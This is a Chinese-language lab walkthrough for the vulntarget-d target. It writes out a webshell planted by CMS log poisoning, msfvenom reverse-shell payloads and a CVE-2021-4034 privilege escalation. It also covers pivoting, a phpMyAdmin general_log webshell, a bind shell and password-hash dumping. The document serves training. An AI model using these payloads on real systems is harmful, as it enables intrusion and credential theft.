实验目标:获取内网Win7的flag
学习目标:通信隧道/免杀/文件包含漏洞/PHPmyadmin日志GetShell/权限提升
靶机下载:其中vulntarget-d为本次实验机器
百度云:
链接: https://pan.baidu.com/s/1p3GDd7V3Unmq3-wSAvl7_Q 提取码:1p9p
》》》靶机信息《《《
#攻击机
OS:Kali 2022.2
NIC:192.168.1.4
#Web Server
OS:Ubuntu
Server:骑士CMS/宝塔
NIC1:192.168.1.6
NCI2:10.0.20.131/24
userpass:eval/vulntarget
#内网机器
OS:Windows 7
Server:PhPStudy
NIC:10.0.20.136/24
userpass:crow/admin
一:边界主机
1.1:GetShell
步骤一:使用Nmap对目标主机进行扫描,对开放的端口访问发现81
端口为Web站点而8888
端口为宝塔面板
nmap -sT 192.168.1.6
步骤二:访问81
号端口的站点,发现为骑士CMS v6.0.20
可寻找相关的版本漏洞存在任意文件包含漏洞…
步骤三:使用插件Hackbar将访问生成的Shell的木马写入到目标服务器日志中…并到服务器中查看
#HTTP请求
URL:http://192.168.1.6:81//index.php?m=home&a=assign_resume_tpl
POST:variable=1&tpl=<?php fputs(fopen("tx.php","w"),"<?php eval(\\$_POST[x]);?>")?>; ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/>
#日志位置
/www/wwwroot/upload/data/Runtime/Logs/Home/年份_月份_日期.log
步骤四:开始进行文件包含且在upload
目录下存在了tx.php
文件…
URL:http://192.168.1.6:81/index.php?m=home&a=assign_resume_tpl
POST:variable=1&tpl=data/Runtime/Logs/Home/23_03_17.log
步骤五:在浏览器中访问生成的tx.php
一句话木马并使用蚁剑进行链接…发现www
用户的低权限…
1.2:权限提升
步骤六:尝试进行提权,使用MSF生成马并上传至目标主机中运行后上线…
#生成木马
>MSF5执行命令
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=8888 -f elf > mshell.elf
>MSF6执行命令
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.1.4 LPORT=8888 -f elf > mshell.elf
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=192.168.0.24 LPORT=8888 -f elf > mshell.elf
chmod 777 mshell.elf
-p/--payload:指定木马运行的平台
LHOST:Kali攻击机的IP地址
LPORT:Kali攻击机监听的端口
-f/--filetype: 指定产生文件的类型
> :输出重定向操作符
meterpreter -->控制通道
#开启监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.1.4
set lport 8888
show options
run
步骤七:进入到/home/eval/Desktop
目录下发现Flag信息…
步骤八:根据uname -a
执行命令信息可尝试使用CVE-2021-4034进行提权…下载以下项目并执行即可提权成功…
#项目地址
https://github.com/arthepsy/CVE-2021-4034
#执行命令
user@debian:~$ gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
user@debian:~$ ./cve-2021-4034-poc
二:内网主机
步骤一:进行内网信息收集可看到另一个网段的网卡,在MSF中添加路由并设置代理…
#信息收集
ifconfig
#添加路由
use post/multi/manage/autoroute
set session 1
run
#添加代理
use auxiliary/server/socks_proxy
run
步骤二:使用MSF中的auxiliary/scanner/portscan/tcp
模块进行主机存活扫描…
msf6 auxiliary(server/socks_proxy) > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 21,22,23,80,443,8080,3389,445
PORTS => 21,22,23,80,443,8080,3389,445
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 10.0.20.0/24
RHOSTS => 10.0.20.0/24
msf6 auxiliary(scanner/portscan/tcp) > set threads 50
threads => 50
msf6 auxiliary(scanner/portscan/tcp) > run
步骤三:通过配置proxychains
的代理且使用Nmap对目标进行端口开放扫描…发现还开发3306端口…
proxychains nmap -sT -Pn 10.0.20.136 -p22,23,80,139,445,1433,3306,3389,6379,8080
2.1:GetShell
步骤四:配置浏览器代理访问其内网地址10.0.20.136的80与3306端口…没啥特别的
proxychains curl http://10.0.20.136/
proxychains mysql -h 10.0.20.136 -u root -p
步骤五:使用目录扫描工具进行敏感目录扫描,发现存在PHPMyadmin目录访问且尝试登录…
http://10.0.20.136/phpmyadmin/
http://10.0.20.136/phpinfo.php
http://10.0.20.136/l.php
步骤六:使用root:root
默认密码成功登陆且在phpinfo.php页面发现存在站点绝对路径,通过写日志来GetShell…
#绝对路径
C:\phpstudy\PHPTutorial\WWW\phpinfo.php
#Getshell
show global variables like "%genera%"; //查询general_log配置
set global general_log='on'; //开启general log模式
SET global general_log_file='C:/phpstudy/PHPTutorial/WWW/cmd.php'; //设置日志文件保存路径
SELECT '<?php @eval($_POST["vuln"]); ?>'; //phpinfo()写入日志文件
set global general_log='off'; //关闭general_log模式
步骤七:配置蚁剑代理并连接Shell,成功!
2.2:上线MSF
步骤八:执行以下命令进行信息收集…
whoami --》 win-d4s86jo2r26\crow
ipconfig /all --》工作组:10.0.20.136
ping www.baidu.com --》不出网络环境
net user crow --》 管理员组
tasklist /svc --》 存在火绒
步骤九:由于内网主机是不出网而且存在火绒所以这里做一个正向免杀马进行连接…连接成功!
#免杀马
#正向连接
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 2023
set rhost 10.0.20.136
run
步骤十:提升权限抓取明文密码进行破解…开启远程桌面连接登陆 Bingo!!!
#执行命令
getsystem //ok
hashdump //admin密码为空;crow密码为admin;
run post/windows/manage/enable_rdp //ok
》》》总体感受《《《
- 正常的内网攻击套路,重点考察免杀这块!!!
参考链接:
https://xz.aliyun.com/t/8596#toc-6
https://mp.weixin.qq.com/s/4-36O4OaWxu2jX2pzb5_Wg
https://blog.csdn.net/tlovejr/article/details/123845297